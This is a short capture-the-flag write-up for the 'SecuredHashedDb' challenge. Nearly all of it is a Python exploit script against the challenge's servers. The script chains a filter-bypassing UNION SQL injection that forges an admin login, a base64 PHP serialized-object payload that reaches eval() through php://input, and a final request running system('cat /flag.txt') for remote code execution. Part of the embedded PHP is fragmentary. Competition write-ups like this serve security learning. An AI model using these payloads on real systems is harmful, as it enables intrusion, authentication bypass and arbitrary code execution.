Writeup for SecuredHashedDb
To get the admin name "adminRoot00988", simply edit the payload and make a sleep based sql injection
```
import requests
r = requests.Session()
front = "https://app.shdb.challs.dantectf.it"
pl = 'username: \\\' UNION (SELselectECT "3", "adminRoot00988", "$2y$10$UMHmuj7Pq.UIq3bhLf9MZOvCBz.NKkkH18vPmIUYmZwoxGVb0yLmy"); -- -'
r.post(f"{front}/login", data={'username': pl, 'password': 'enzo'})
"""
locationFile);
preg_match('/[^;]+;$/', $content_of_the_file, $matches);
return eval($matches[0]);
}
}
class MD5DBEngine {
private $HashString = "";
private $objArray = array();
public function __construct() {
$this->objArray['obj'] = new Visualizer();
}
}
$v = new MD5DBEngine();
echo(base64_encode(serialize($v)));
?>
"""
data = {'key': 'md5Searcher', 'value': 'TzoxMToiTUQ1REJFbmdpbmUiOjI6e3M6MjM6IgBNRDVEQkVuZ2luZQBIYXNoU3RyaW5nIjtzOjA6IiI7czoyMToiAE1ENURCRW5naW5lAG9iakFycmF5IjthOjE6e3M6Mzoib2JqIjtPOjEwOiJWaXN1YWxpemVyIjoxOntzOjI0OiIAVmlzdWFsaXplcgBsb2NhdGlvbkZpbGUiO3M6MTE6InBocDovL2lucHV0Ijt9fX0'}
ok = r.post(f"{front}/getSignedCookie", data=data)
token = ok.cookies._cookies["app.shdb.challs.dantectf.it"]["/"]["magicToken"].value
b = requests.Session()
back = "https://backend.shdb.challs.dantectf.it"
b.cookies.set("decodeMyJwt", token, domain="backend.shdb.challs.dantectf.it")
print(b.post(f"{back}/index.php", data="system('cat /flag.txt');").text)
```